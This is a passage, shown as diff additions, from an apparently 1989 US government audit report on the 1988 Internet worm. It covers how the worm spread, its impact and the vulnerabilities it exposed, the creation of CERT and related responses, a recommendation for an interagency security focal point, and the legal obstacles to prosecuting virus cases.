+other programs or user intervention to transmit it).  
+
+     The networks themselves (i.e., the communications hardware
+and software that connect the computer systems) were not infected
+by the virus; rather, they served as a roadway enabling the virus
+to spread rapidly to vulnerable computers.  In transit, the virus
+was indistinguishable from legitimate traffic and, thus, could
+not be detected until it infected a computer.  The principal
+symptoms of the virus were degradation of system response and
+loss of data storage space on file systems.
+
+How the Virus Spread
+
+     The Internet virus spread largely by exploiting security
+holes in systems software based on the Berkeley Software
+Distribution UNIX system and by taking advantage of
+vulnerabilities in host site security policies.**  UNIX is the
+most commonly used operating system on the Internet--a University
+of California, Berkeley, researcher estimated that about three-
+quarters of the computers attached to the Internet use some
+version of UNIX.  Machines infected were VAX and Sun-3 computer
+systems.***
+     
+  ** UNIX is a registered trademark of AT&T Laboratories.
+     Berkeley distributes its own versin of UNIX, and a
+     number of other systems manufacturers have selected
+     the Berkeley UNIX version as the basis for their own
+     operating systems.  The virus did not attack the
+     operating system's "kernel" that manages the system;
+     rather, it exploited flaws in peripheral service or
+     utility programs.
+
+ *** VAX and Sun-3 computers are built by Digital Equipment
+     Corporation and Sun Microsystems, Inc., respectively.
+
+     The virus propagated by using four methods of attack:**
+
+  ** See appendix I for a more detailed account of the
+     security flaws the virus exploited.
+
+     Sendmail:  A utility program that handles the complex tasks
+of routing and delivering computer mail.  The virus exploited a
+"debug" feature of sendmail that allowed a remote operator to
+send executable programs.  After issuing the debug command, the
+virus gave orders to copy itself.
+
+     Fingerd:  A utility program that allows users to obtain
+public information about other users, such as a user's full name
+or telephone extension.  A hole in the program allowed the virus
+to propagate to distant machines.
+
+     Passwords:  The virus tried different methods to guess user
+passwords.  Once the virus gained access through a correct
+password, it could masquerade as a legitimate user and exercise
+that user's privileges to gain access to other machines.
+
+     Trusted hosts:  Trusted host features provide users
+convenient access to each other's resources.  This is not a
+software hole; it is a convenience sometimes used on local
+networks where users frequently use services provided by many
+different computers.  By using these features, the virus spread
+quickly within local networks once one computer had been
+penetrated.
+
+Chronology of the Virus 
+
+     The onset of the virus was extremely swift.  The first
+reports of the virus came from several sites at 9 p.m., Eastern
+Standard Time, on Wednesday, November 2.  An hour later, the
+virus was reported at multiple Internet sites, and by early
+morning, November 3, the virus had infected thousands of computer
+systems.  
+
+     Most of the nation's major research centers were affected,
+including Energy's Lawrence Livermore National Laboratory; NASA's
+Ames Research Center; the University of California, Berkeley; the
+Massachusetts Institute of Technology (MIT); Carnegie Mellon
+University; Cornell University; Purdue University; and many
+others.  The virus also affected sites on Milnet and several
+overseas sites.  As noted earlier, the Internet is an open,
+unclassified network; the virus did not affect classified
+government or operational military systems.
+
+     Once the virus was detected, many sites disconnected their
+computers from the Internet, leaving only one or two computers
+running to communicate with other sites and to permit study of
+virus activity.  By Thursday, November 3, the sendmail and
+fingerd holes had been identified, and by late that night, the
+Computer Systems Research Group at the University of California,
+Berkeley, had posted patches on network bulletin boards to mend
+the holes.**   
+     By Friday evening, the virus had been eliminated at most
+sites.  At a November 8 virus post-mortem conference, hosted by
+the National Security Agency's National Computer Security Center
+(NCSC), attendees concluded that the virus had been analyzed and
+eradicated by computer science experts located primarily at
+university research institutions, with U.S. government personnel
+playing a small role.                 
+   
+  ** A patch is a modification made to an object program.
+     Patches to the sendmail hole had been posted on
+     Thursday morning.
+
+OBJECTIVES, SCOPE, AND METHODOLOGY
+
+     In response to an October 14, 1988, request of the Chairman,
+Subcommittee on Telecommunications and Finance, House Committee
+on Energy and Commerce, and subsequent agreements with his
+office, the objectives of our review were to 
+
+     -- describe the virus incident,
+
+     -- examine issues relating to Internet security and
+        vulnerabilities, and
+
+     -- discuss factors affecting the prosecution of computer
+        virus incidents.
+
+In addition, we sought to identify federal research directed
+specifically at viruses and to provide an overview of research
+that may improve security on open networks, such as the Internet.
+
+
+     To understand the nature, structure, and management of the
+Internet and to determine events surrounding the Internet virus
+and related security issues, we reviewed: 
+
+     -- Reports, analyses, and briefings prepared by NCSC, DARPA,
+        the Defense Communications Agency, NSF, NASA, and the
+        Department of Energy.  
+
+     -- Academic analyses prepared by individuals associated with
+        MIT, Purdue University, and the University of Utah.
+
+     -- Accounts of the virus and its aftermath in scientific
+        publications, industry journals, and newspapers.  
+     
+     We discussed the virus incident, implications of an open
+network environment, security issues, the need for increased
+centralized management, and the National Research Network with 
+
+     -- Officials from the agencies listed above as well as from
+        the National Institute of Standards and Technology
+        (NIST), OSTP, FCCSET, FRICC, the Office of Management and
+        Budget, and the General Services Administration. 
+
+     -- Officials representing systems software vendors,
+        including the Computer Systems Research Group of the
+        University of California, Berkeley; Sun Microsystems,
+        Inc.; and Digital Equipment Corporation. 
+
+     -- Network users representing federal and academic sites,
+        including Harvard University, MIT, NASA's Ames Research
+        Center, Energy's Lawrence Livermore National Laboratory,
+        and the University of California, Berkeley.
+
+     -- Officials from private sector security companies in the 
+        Washington, D.C., area and California and from SRI,
+        International, which operates the Defense-funded Network
+        Information Center.
+
+     To obtain a perspective on factors affecting the prosecution
+of computer virus offenses, we discussed the relevant laws with
+officials of the Federal Bureau of Investigation, Department of
+Justice, and Secret Service.  We also discussed these issues with
+representatives of the Colorado Association of Computer Crime
+Investigators and the University of Colorado's Computer Law
+Center.
+
+     We discussed research aimed at improving computer and open
+network security with officials from government agencies and
+systems software vendors cited above; with members of the
+Internet Activities Board, a technical group concerned with
+Internet standards; and with officials from Bolt, Beranek, and
+Newman, Inc., which maintains Arpanet's Network Operations
+Center.  We did not develop a complete inventory of current
+research nor did we evaluate its potential effectiveness.
+
+     Our work was performed in accordance with generally accepted
+government auditing standards.  We performed our work primarily
+between November 1988 and March 1989 in Washington, D.C., and at
+research institutions and vendor locations in Massachusetts and
+California.  We discussed the contents of a draft of this report
+with DARPA, NSF, and OSTP officials, and their comments have been
+incorporated where appropriate.  However, as requested, we did
+not obtain official agency comments.
+ 
+
+                          CHAPTER 2 
+
+       VIRUS FOCUSES ATTENTION ON INTERNET VULNERABILITIES
+
+     Although the virus spread swiftly over the networks to
+vulnerable computers, it apparently caused no permanent damage. 
+However, the virus highlighted vulnerabilities relating to (1)
+the lack of a focal point for responding to Internet-wide
+security problems, (2) host site security weaknesses, and (3)
+problems in developing, distributing, and installing software
+fixes.  A number of agencies and organizations have taken actions
+since the virus to address identified problems.  However, we
+believe that these actions alone will not provide the focus
+needed to adequately address the Internet's security
+vulnerabilities.  
+
+IMPACT OF VIRUS
+
+     The virus caused no lasting damage; its primary impact was
+lost processing time on infected computers and lost staff time in
+putting the computers back on line.  The virus did not destroy or
+alter files, intercept private mail, reveal data or passwords, or
+corrupt data bases.  
+
+     No official estimates have been made of how many computers
+the virus infected, in part because no one organization is
+responsible for obtaining such information.  According to press
+accounts, about 6,000 computers were infected.  This estimate was
+reportedly based on an MIT estimate that 10 percent of its
+machines had been infected, a figure then extrapolated to
+estimate the total number of infected machines.  However, not all
+sites have the same proportion of vulnerable machines as MIT.  A
+Harvard University researcher who queried users over the Internet
+contends that a more accurate estimate would be between 1,000 and
+3,000 computers infected.
+
+     Similar problems exist in trying to estimate virus-related
+dollar loss.  The total number of infected machines is unknown,
+and the amount of staff time expended on virus-related problems
+probably differed at each site.  The Harvard University
+researcher mentioned earlier estimated dollar losses to be
+between $100,000 and $10 million.     
+
+     Estimated losses from individual sites are generally not
+available.  However, NASA's Ames Research Center and Energy's
+Lawrence Livermore National Laboratory, two major government
+sites, estimated their dollar losses at $72,500 and $100,000,
+respectively.  These losses were attributed primarily to lost
+staff time.
+
+     Although the virus is described as benign because apparently
+no permanent damage was done, a few changes to the virus program
+could have resulted in widespread damage and compromise,
+according to computer experts.  For example, these experts said
+that with a slightly enhanced program, the virus could have
+erased files on infected computers or remained undetected for
+weeks, surreptitiously changing information on computer files.
+
+VULNERABILITIES HIGHLIGHTED BY VIRUS
+
+     In the aftermath of the virus, questions have been raised
+about how the virus spread, how it was contained, and what steps,
+if any, are needed to increase Internet security.  These
+questions have been the subject of a number of post-virus
+meetings and reports prepared by government agencies and
+university researchers.**
+
+  ** Major meetings included (1) a November 8 NCSC-hosted
+     meeting to review the virus attack and its aftermath,
+     attended by over 75 researchers and administrators from
+     government and academia and (2) a December 2 meeting
+     of UNIX vendors and users, hosted by NCSC, NIST, and
+     a users group.
+
+     Based on these assessments, we believe that the virus
+incident revealed several vulnerabilities that made it easier for
+the virus to spread and more difficult for the virus to be
+eradicated.  These vulnerabilities also came into play in later
+intrusions (not involving a virus) onto several Internet sites in
+November and December.  The vulnerabilities--lack of a focal
+point for addressing Internet-wide security problems; security
+weaknesses at some host sites; and problems in developing,
+distributing, and installing systems software fixes--are
+discussed below.  
+
+Lack of a Focal Point to Address
+Internet-wide Security Problems
+
+     During the virus attack, the lack of an Internet security
+focal point made it difficult to coordinate emergency response
+activities, communicate information about the virus to vulnerable
+sites, and distribute fixes to eradicate it.
+
+     A Defense Communications Agency account of the virus cited a
+series of problems stemming from the lack of a central,
+coordinating mechanism.  For example:
+
+     -- Although the virus was detected at various sites, users
+        did not know to whom or how to report the virus, thus
+        hindering virus containment and repair.
+
+     -- There were no plans or procedures for such an emergency
+        situation.  People used ad hoc methods to communicate,
+        including telephone or facsimile.  In many instances,
+        sites disconnected from the Internet.  While effective in
+        the short run, this action also impeded communications
+        about fixes.
+
+     -- It was unclear who was responsible for protecting
+        networks from viruses, resulting in confusion among user,
+        network, and vendor groups.
+
+     The confusion surrounding the virus incident was echoed by
+many Internet users.  For example: 
+
+     -- A Purdue University researcher concluded that user
+        response to the virus was ad hoc and resulted in
+        duplicated effort and failure to promptly disseminate
+        information to sites that needed it.**
+
+     -- At Energy's Los Alamos National Laboratory, researchers
+        reported that they received conflicting information on
+        fixes.  Because they did not have a UNIX expert on site,
+        they had difficulty determining which fix was reliable.
+
+     -- At Harvard University, researchers expressed frustration
+        at the lack of coordination with other sites experiencing
+        the same problems.
+
+  ** Eugene H. Spafford, "The Internet Worm Program: An
+     Analysis", Department of Computer Sciences, Purdue
+     University, Nov. 1988.
+
+     In a report resulting from NCSC's post-mortem meeting,
+network sponsors, managers, and users from major sites--including
+Defense's Army Ballistic Research Laboratory, Energy's Lawrence
+Livermore National Laboratory, DARPA, Harvard, MIT, and the
+University of California, Berkeley--called for improved
+communications capabilities and a centralized coordination center
+to report problems to and provide solutions for Internet users.
+
+Host Security Weaknesses
+Facilitated Spread of Virus 
+
+     Key to the Internet's decentralized structure is that each
+host site is responsible for establishing security measures
+adequate to meet its needs.  Host computers are frequently
+administered by systems managers, typically site personnel
+engaged in their own research, who often serve as systems
+managers on a part-time basis.                
+
+     According to virus incident reports as well as network
+users, weaknesses at host sites included (1) inadequate attention
+to security, such as poor password management, and (2) systems
+managers who are technically weak.
+
+
+     Inadequate Attention to Security
+
+     Discussions of computer security frequently cite the trade-
+offs between increased security and the sacrifices, in terms of
+convenience, system function, flexibility, and performance, often
+associated with security measures.  In deciding whether to
+establish additional security measures, systems managers must
+often be willing to make sacrifices in these areas.  According to
+Internet users from academia, government, and the private sector,
+systems managers at research sites often are not very concerned
+with security.
+
+     One example of a trade-off between security and convenience
+involves trusted host features on UNIX that allow users to
+maintain a file of trusted computers that are granted access to
+the user's computer without a password.  The trusted host
+features make access to other computers easier; however, they
+also create potential security vulnerabilities because they
+expand the number of ways to access computers. 
+
+     The virus took advantage of the trusted host features to
+propagate among accounts on trusted machines.  Some sites
+discourage use of the trusted host features; however, other sites
+use them because of their convenience.  One Internet user
+observed that users do not like to be inconvenienced by typing in
+their password when accessing a trusted computer, nor do they
+want to remember different passwords for each computer with which
+they communicate.  
+
+    Another example involving inadequate attention to security is
+in password management.  According to an NSF official, a major
+vulnerability exploited by the virus was lax password security. 
+The official stated that too few sites observe basic procedures
+that reduce the risk of successful password guessing, such as
+prohibiting passwords that appear in dictionaries or other simple
+word lists and periodically changing passwords.  
+
+     The relative ease with which passwords can be guessed was
+discussed in an analysis of the Internet virus done by a
+University of Utah researcher.**  He cited a previous study
+demonstrating that out of over 100 password files, up to 30
+percent were guessed using just the account name and a couple of
+variations.  
+
+  ** Donn Seeley, "A Tour of the Worm", Department of Computer
+     Science, University of Utah, Nov. 1988.  Unpublished report.
+
+     Careful control over passwords often inconveniences users to
+some degree.  For example, an article in Computers and Security,
+an international journal for computer security professionals,
+notes that computer-generated passwords tend to be more secure
+than user-selected passwords because computer-generated passwords
+are not chosen by an obvious method easily guessed by an
+intruder.  However, computer-generated passwords are generally
+more difficult to remember.**
+
+  ** Belden Menkus, "Understanding the Use of Passwords",
+     Computers and Security, Vol. 7, No. 2, April 1988.
+
+     Systems Managers Who Are Technically Weak
+
+     A number of Internet users, as well as NCSC and Defense
+Communications Agency virus reports, stated that the technical
+abilities of systems managers vary widely, with many managers
+poorly equipped to deal with security issues, such as the
+Internet virus.  For example, according to the NCSC report, many
+systems managers lacked the technical expertise to understand
+that a virus attacked their systems and had difficulty
+administering fixes.  The report recommended that standards be
+established and a training program begun to upgrade systems
+manager expertise.
+
+Problems in Developing, Distributing,
+and Installing Software Fixes
+
+     Systems software is generally very complex.  A major problem
+programmers face in software design is the difficulty in
+anticipating all conditions that occur during program execution
+and understanding precisely the implications of even small
+changes.  Thus, systems software often contains flaws that may
+create security problems, and software changes often introduce
+new problems.  
+
+     Internet users and software vendors frequently cited
+problems relating to inadequacies in developing, distributing,
+and installing corrections to identified software holes.  Holes
+that are not expeditiously repaired may create security
+vulnerabilities.  The Internet virus incident and two later
+Internet intrusions highlighted problems in getting vendors to
+develop and distribute fixes and in having host sites install the
+fixes.
+     
+     Problems With Vendors
+
+     A number of network users representing major Internet sites
+said that vendors should be more responsive in supplying patches
+to identified software holes.  For example, more than 1 month
+after the virus, several vendors reportedly had not supplied
+patches to fix the sendmail and fingerd holes.  
+
+     Most vendors, when notified of a hole, send users a patch to
+repair the hole or wait until their next software revision, at
+which time the hole (as well as any other identified flaws) will
+be corrected.  However, since a revision may take up to 6 to 9
+months to release, the latter approach may leave systems
+vulnerable to security compromise for long periods.  According to
+Internet users, critical security patches should be provided as
+quickly as possible and should not be delayed until the next
+release of the software.**
+
+  ** According to a Defense official, this problem is
+     compounded by the fact that sites not subscribing to
+     software maintenance/support may not receive any new
+     releases.
+
+     Officials of one major vendor pointed out the problems they
+faced in distributing patches expeditiously.  According to these
+officials:
+
+     -- Their company sells computers with three or four
+        different architectures, each with several versions of
+        the UNIX operating system.  When a fix is needed, they
+        have to distribute about 12 different patches, making it
+        difficult to develop and release patches quickly.
+
+     -- Patches have to be carefully screened so that new holes
+        will not be inadvertently incorporated.  The officials
+        noted that the quality assurance this screening provides
+        is an important part of their business because their
+        reputation depends on the quality of their software.
+
+     -- Vendors have a hard time keeping track of customers who
+        do not have service maintenance contracts.  In addition,
+        some systems are sold through contractors and the vendors
+        may not know the contractors' customer bases.
+
+     -- Disseminating a patch to thousands of users can cost a
+        company millions of dollars.
+
+The vendor officials said they considered these factors in
+determining how to implement a patch.
+     
+     Berkeley's Computer Systems Research Group, which
+distributes its version of UNIX, has a software policy that
+differs from that of many other vendors.  Berkeley generally
+provides source code along with the UNIX object code it sells to
+users.**  However, Berkeley's policy is unusual--most vendors
+treat source code as proprietary and it is typically not provided
+to users.  With source code, an experienced systems manager may
+be able to fix holes without waiting for the vendor to supply a
+patch or a system revision.  
+
+  ** Source code is the program written by the programmer.
+     It is translated (by a compiler, interpreter, or
+     assembler program) into object code for execution by
+     the computer.
+
+     Berkeley routinely transmits fixes to UNIX users and vendors
+through networks and bulletin boards.  While this may result in
+timely fixes, it can also create security vulnerabilities.  In
+particular, when a fix is widely disseminated, information about
+a vulnerability is also made apparent.  Thus, there is a race
+between intruders seeking to exploit a hole and systems managers
+working to apply the fix.  
+
+     This dilemma was highlighted in multiple intrusions, which
+occurred in November and December 1988, at several Internet
+sites, including Lawrence Livermore National Laboratory and Mitre
+Corporation.  In these instances, intruders exploited
+vulnerabilities in a UNIX utility program, called FTPD, that
+transfers files between Internet sites.**
+
+  ** As discussed, the Internet virus exploited vulnerabilities
+     in two other UNIX utility programs, sendmail and fingerd.
+
+     Berkeley had sent out patches for the FTPD hole in October
+1988.  However, other UNIX vendors had not released patches for
+the hole.  Mitre officials reported that their systems managers
+applied the Berkeley patch on many of their computers, but not on
+the computer penetrated by the intruders.  Lawrence Livermore
+officials reported that they applied patches to computers that
+use Berkeley UNIX.  However, the vendor for its other computers
+had not supplied a patch before the intrusion.  Lawrence
+Livermore did not have source code for the other vendor's
+machines, so they had to wait for the vendor's patch.  
+
+     According to a Defense official, the intruders most likely
+tried to gain access to many machines until they found those
+machines to which patches had not been applied.  Once the
+intruders penetrated the FTPD hole, they installed "trap doors"
+by adding new accounts and modifying systems routines, which
+allowed them continued access after the FTPD holes were closed. 
+Officials from the Federal Bureau of Investigation and from sites
+involved in the intrusions said that the intruders have been
+identified and the case is under investigation.  Reportedly,
+aside from the trap doors, no files were altered, and no
+classified systems were affected.  
+
+     Problems in Installing Software Fixes
+
+     Even when a vendor distributes fixes, there is no assurance 
+that sites will install them.  Internet users and managers at
+several major university research and government sites cited the
+following reasons as to why fixes were not expeditiously
+installed:
+
+     -- Systems managers vary in their ability and motivation to
+        manage their systems well.  
+
+     -- System managers often serve on a part-time basis, and
+        time spent on systems management takes away time from
+        research.  
+     -- System revisions may contain errors, so some systems
+        managers are reluctant to install the revisions.  
+
+     -- System revisions may be expensive if the system is not on
+        a maintenance contract.
+
+     -- Some sites do not know who their system managers are and,
+        thus, have problems ensuring that fixes get distributed
+        and installed.
+
+     As discussed earlier, problems and confusion resulted when
+sites had to respond to the Internet virus.  Although Berkeley
+posted a fix to both the sendmail and fingerd holes within 2 days
+after the onset of the virus and Sun Microsystems reportedly
+published a fix within 5 days, almost a month after the virus a
+number of sites reportedly still had not reconnected their host
+computers to the Internet.  
+
+ACTIONS TAKEN IN RESPONSE TO VIRUS
+
+     In response to the Internet virus, DARPA, NIST, NCSC,** and
+a number of other agencies and organizations have taken actions
+to enhance Internet security.  These actions include developing
+computer security response centers, coordinating meetings,
+preparing publications to provide additional guidance, and
+publishing statements of ethics.***
+
+  ** NIST is responsible for developing standards and guidelines
+     for the security of unclassified federal computer systems.
+     It performs these responsibilities with the National
+     Security Agency's technical advice and assistance. The
+     Natioonal Security Agency (of which NCSC is a part) is
+     responsible for the security of classified informatin in
+     the defense and national security areas, including that
+     stored and processed on computers.
+
+ *** In addition, agencies are engaged in ongoing research
+     aimed at improving network and computer security.  An
+     overview of these activities is presented in appendix II.
+
+Computer Security Response
+Centers Established   
+
+     In the wake of the virus, many Internet users, site
+managers, and agency officials have voiced concerns about
+problems in responding to and preventing emergency situations,
+such as the Internet virus.  To address these concerns, some
+agencies are developing computer security response centers to
+establish emergency and preventative measures.
+
+     The first center, the Computer Emergency Response Team
+(CERT), was established by DARPA in mid-November 1988.  CERT's
+mandate is broad--it is intended to support all of the Internet's
+research users.  DARPA views CERT as a prototype effort for
+similar organizations in other computer communities.  Also, CERT
+is seen as an evolving organization whose role, activities, and
+procedures will be defined as it gains experience responding to
+Internet security problems.  
+
+     According to DARPA, CERT's three main functions are to
+provide 
+     -- mechanisms for coordinating community response in
+        emergency situations, such as virus attacks or rumors of
+        attacks;
+
+     -- a coordination point for dealing with information about
+        vulnerabilities and fixes; and
+
+     -- a focal point for discussion of proactive security
+        measures, coordination, and security awareness among
+        Internet users.
+
+CERT has no authority, although it can make recommendations. 
+CERT officials recognize the need to establish credibility and
+support within the Internet community so that its recommendations
+will be acted upon.
+
+     CERT's nucleus is a five-person coordination center located
+at the Software Engineering Institute at Carnegie Mellon
+University in Pennsylvania.**  CERT has enlisted the help of over
+100 computer specialists who are on call when problems arise in
+their areas of expertise.  In addition, CERT is developing
+working relationships with government organizations, including
+NCSC, NIST, Energy, and the Federal Bureau of Investigation, and
+with vendor and user groups.  CERT expects to rely on DARPA
+funding until its value is recognized by the Internet community
+and alternate funding mechanisms are established--probably within
+3 to 5 years.
+
+  ** The objective of the institute, which is a Federally
+     Funded Research and Development Center, is to accelerate
+     the movement of software technology into defense systems.
+
+     The Department of Energy began setting up a center at
+Lawrence Livermore National Laboratory in February 1989.  This
+center is to focus on proactive preventive security and on
+providing rapid response to computer emergencies within the
+agency.  The center plans to develop a data base of computer
+security problems and fixes, provide training, and coordinate the
+development of fixes.  In addition, the center is considering
+developing software to assist in network mapping and to assure
+proper system configuration.
+
+Meetings Held and Guidance Issued
+
+     NIST is coordinating interagency meetings to (1) draw on
+agency experience and develop a model for agencies to use in
+setting up response/coordination centers and (2) educate others
+on the model that is developed.  NIST has also set up a computer
+system that may be used as a data base for computer problems and
+fixes and as an alternate means of communication in case the
+Internet's electronic mail system becomes incapacitated.  In
+addition, NIST is planning to issue guidance this summer that
+will discuss threats inherent to computers and how such threats
+can be reduced.  
+
+     NCSC plans to distribute three security-related reports
+discussing (1) viruses and software techniques for detecting
+them, (2) the role of trusted technology in combating virus-
+related programs, and (3) security measures for systems managers. 
+NCSC is also providing an unclassified system to serve as an
+alternate means of communications in case the Internet's
+electronic mail system is not working.
+
+Ethics Statements Released
+
+     The Internet Activities Board, a technical group comprising
+government, industry, and university communications and network
+experts, issued a statement of ethics for Internet users in
+February 1989.  Many Internet users believe there is a need to
+strengthen the ethical awareness of computer users.  They believe
+that a sense of heightened moral responsibility is an important
+adjunct to any technical and management actions taken to improve
+Internet security.   
+
+     The Board endorsed the view of an NSF panel that
+characterized any activity as unethical and unacceptable that
+purposely
+
+     -- seeks to gain unauthorized access to Internet resources;
+
+     -- disrupts the intended use of the Internet; or 
+
+     -- wastes resources, destroys the integrity of computer-
+        based information, or compromises users' privacy.
+
+     The Computer Professionals for Social Responsibility and
+various network groups have also issued ethics statements
+encouraging (1) enforcement of strong ethical practices, (2) the
+teaching of ethics to computer science students, and (3)
+individual accountability.  
+
+CONCLUSIONS
+
+     In the 20 years in which it evolved from a prototype DARPA
+network, the Internet has come to play an integral role in the
+research and development community.  Through the Internet,
+researchers have been able to collaborate with colleagues, have
+access to advanced computing capabilities, and communicate in new
+ways.  In providing these services, the Internet has gone beyond
+DARPA's original goal of proving the feasibility of computer
+networking and has served as a model for subsequent public data
+networks.  
+
+     Since there is no lead agency or organization responsible
+for Internet-wide policy-making, direction, and oversight,
+management on the Internet has been decentralized.  We believe
+this is because, at least in part, Internet developments were
+driven more by technological considerations than by management
+concerns and because decentralized authority provided the
+flexibility needed to accommodate growth and change on an
+evolving network.  However, we believe that the Internet has
+developed to the point where a central focus is necessary to help
+address Internet security concerns.  These concerns will take on
+an even greater importance as the Internet evolves into the
+National Research Network, which will be faster, more accessible,
+and have more international connections than the Internet.
+
+     The Internet virus and other intrusions highlighted certain
+vulnerabilities, including 
+
+     -- lack of a focal point in addressing Internet-wide
+        security issues, contributing to problems in coordination
+        and communications during security emergencies;   
+
+     -- security weaknesses at some host sites; and 
+
+     -- problems in developing, distributing, and installing
+        systems software fixes.
+
+     Since the virus, various steps have been taken to address
+concerns stemming from the incident, from creating computer
+security response centers to issuing ethics statements to raise
+the moral awareness of Internet users.
+
+     We support these actions and believe they are an important
+part of the overall effort required to upgrade Internet security. 
+Host sites may need to take additional actions to heighten
+security awareness among users and to improve identified host
+level weaknesses, such as lax password management.    
+
+     However, many of the vulnerabilities highlighted by the
+virus require actions beyond those of individual agencies or host
+sites.  For this reason, we believe that a security focal point
+should be established to fill a void in the Internet's management
+structure and provide the focused oversight, policy-making, and
+coordination necessary at this point in the Internet's
+development.
+
+     For example, we believe that concerns regarding the need for
+a policy on fixes for software holes would be better addressed by
+a security focal point representing the interests of half a
+million Internet users than by the ad hoc actions of host sites
+or networks.  Similarly, a security focal point would better
+ensure that the emergency response teams being developed by
+different Internet entities are coordinated and that duplication
+is lessened.
+
+     There are no currently available technical security fixes
+that will resolve all of the Internet's security vulnerabilities
+while maintaining the functionality and accessibility that
+researchers believe are essential to scientific progress. 
+Similarly, there is no one management action that will address
+all of the Internet's security problems.  However, we believe
+concerted action on many fronts can enhance Internet security and
+provide a basis for security planning on the National Research
+Network.
+
+     FRICC, an informal group made up of representatives of the
+five agencies that operate Internet research networks, is
+attempting to coordinate network research and development,
+facilitate resource sharing, and reduce operating costs. 
+However, no one agency or organization has responsibility for
+Internet-wide management and security.  The Office of Science and
+Technology Policy, through its Federal Coordinating Council on
+Science, Engineering and Technology, has, under its mandate to
+develop and coordinate federal science policy, taken a leadership
+role in coordinating development of an interagency implementation
+plan for the National Research Network.  Therefore, we believe
+that the Office, through FCCSET, would be the appropriate body to
+coordinate the establishment of a security focal point.  
+
+RECOMMENDATION
+
+     We recommend that the President's Science Advisor, Office of
+Science and Technology Policy, through FCCSET, coordinate the
+establishment of an interagency group to serve as an Internet
+security focal point.  This group should include representatives
+from the federal agencies that fund Internet research networks.
+
+     As part of its agenda, we recommend that this group:
+
+     -- Provide Internet-wide policy, direction, and coordination
+        in security-related areas to help ensure that the
+        vulnerabilities highlighted by the recent incidents are
+        effectively addressed.
+
+     -- Support efforts already underway to enhance Internet
+        security and, where necessary, assist these efforts to
+        ensure their success.
+
+     -- Develop mechanisms for obtaining the involvement of
+        Internet users; systems software vendors; industry and
+        technical groups, such as the Internet Advisory Board;
+        and NIST and National Security Agency, the government
+        agencies with responsibilities for federal computer
+        security.
+
+     -- Become an integral part of the structure that emerges to
+        manage the National Research Network.
+ 
+
+                            CHAPTER 3
+
+                  FACTORS HINDERING PROSECUTION
+                     OF COMPUTER VIRUS CASES
+
+     The Internet incident is a recent example of the growing
+number of instances in which computers, or their information or
+programs, have been the target of sabotage or attack.  As of
+March 23, 1989, there have been no indictments in the Internet
+virus case.  Because it is an open matter, Justice officials
+would not provide any specific information about the case.
+
+     There are some factors that may hinder prosecution of
+computer virus-type incidents.  For example: 
+
+     -- There is no federal statute that specifically makes such
+        conduct a crime, so other federal laws must be applied to
+        computer virus-type cases.  
+
+     -- The technical nature of computer virus-type cases may
+        hinder prosecution.  
+
+As yet, there have been no federal prosecutions of computer
+virus-type incidents.
+
+NO STATUTE SPECIFICALLY
+DIRECTED AT VIRUSES
+
+     No federal law is specifically directed at computer virus-
+type incidents.  Thus, the ability to prosecute such cases
+depends on whether conduct associated with a particular incident,
+such as unauthorized access or destruction of records, falls
+within an existing statute.  
+
+     The Computer Fraud and Abuse Act of 1986 (18 U.S.C. 1030) is
+the act most closely directed at computer crimes.  The most
+relevant provisions in the act relating to virus-type incidents
+make it a crime for individuals to
+
+     -- intentionally,** without authorization, access a federal
+        computer, or a federally used computer if such access
+        affects the government's operation of the computer;
+
+  ** The term "intentionally" means that the outcome was an
+     objective of the conduct.
+
+     -- knowingly,** and with intent to defraud, access a federal
+        interest computer*** or exceed authorized access, where
+        such access furthers the intent to defraud and obtains
+        anything of value, unless the object of the fraud and the
+        thing of value consists only of the use of the computer;
+        or 
+
+  ** The term "knowingly" means that the actor was aware
+     that the result was practically certain to follow
+     from the conduct.
+
+ *** The act defines federal interest computers as ones
+     exclusively used by the government or a financial
+     institution, or if not exclusively so used, used by
+     government or a financial institution and the conduct
+     constituting the offense affects the financial
+     institution's or the government's operation of the
+     computer, or a computer that is one of two or more
+     used in committing the offense, not all of which
+     are in the same state (18 U.S.C. 1030(e)(2)).
+
+     -- intentionally, without authorization, access and by such
+        conduct alter, damage, or destroy information in any
+        federal interest computer or prevent the authorized use
+        of such computer or information and thereby (A) cause
+        losses aggregating $1,000 or more to one or more others
+        during any one year or (B) modify or impair, or
+        potentially modify or impair, the medical examination,
+        diagnosis, treatment or care of one or more individuals.
+
+     The act defines some relevant terms, but not others.  For
+instance, the act defines "exceeds authorized access" as access
+to a computer with authorization and use of such access to obtain
+or alter information in the computer that the accessor is not
+entitled to obtain or alter (18 U.S.C. 1030(e)(6)).  However, the
+act does not define "access," "information," or "prevents the
+authorized use."
+
+     Because some of the terminology has not been defined, it is
+not clear whether all virus-type cases would fit within the act's
+scope.  For instance, it is unclear whether the introduction of a
+virus into a system by electronic mail, a nominally authorized
+means of entry, would constitute unauthorized access as
+contemplated by the statute.  Nor is it clear that a virus that
+merely slowed a system's response time would prevent its
+authorized use.
+
+     There are also obstacles in applying other federal laws to
+virus-type incidents.  For example, it is possible to view the
+creation and use of counterfeit passwords (used, for example, in
+the Internet incident) as a violation of the Credit Card Fraud
+Act of 1984 (18 U.S.C. 1029).  This statute prohibits the
+production or use of counterfeit or unauthorized access devices
+with the intent to defraud.  However, the act's legislative
+history** suggests that it is intended to address financial and
+credit abuses, and it is not certain that its prohibitions could
+be extended to nonfinancial incidents.  
+
+  ** See House Report 894, 98th Congress, 2d Session;
+     Senate Report 368, 98th Congress, 2d Session.
+
+     Another law that has been suggested for use in prosecuting
+virus-type incidents is the Wire Fraud Act (18 U.S.C. 1343). 
+This act prohibits the introduction into interstate or foreign
+commerce of radio, wire, or television communications intended to
+further a fraudulent scheme.  However, applying this statute to
+virus-type incidents may be complicated by the absence of
+traditional fraud elements, such as the effort to obtain
+something of value. 
+
+     In addition to federal laws, computer crimes may be
+prosecuted under state laws.  Forty-eight states have adopted
+legislation dealing with computer crimes, and the other two are
+currently considering such legislation.**  State laws vary widely
+in terms of coverage and penalties.  For instance, some state
+laws:
+
+     -- Include provisions that specifically define information
+        stored in computers as property.  This definition
+        facilitates prosecution under traditional statutes
+        governing property crimes.  
+
+     -- Authorize victims to sue for violations of the statutes. 
+
+     -- Provide for forfeiting (that is, permanently taking away)
+        the violator's computer property used in the crime as
+        part of the penalty.  Federal statutes do not provide for
+        such a remedy or penalty.
+
+  ** Statistics were not readily available regarding the
+     extent to which state laws have been used for prosecuting
+     computer virus-type cases.
+
+TECHNICAL NATURE OF VIRUS-TYPE 
+INCIDENTS MAY HINDER PROSECUTION
+
+     The technical nature of computer virus-type incidents may
+hinder prosecution.  Even when a violation can be clearly
+established, the evidence is likely to be arcane and technical,
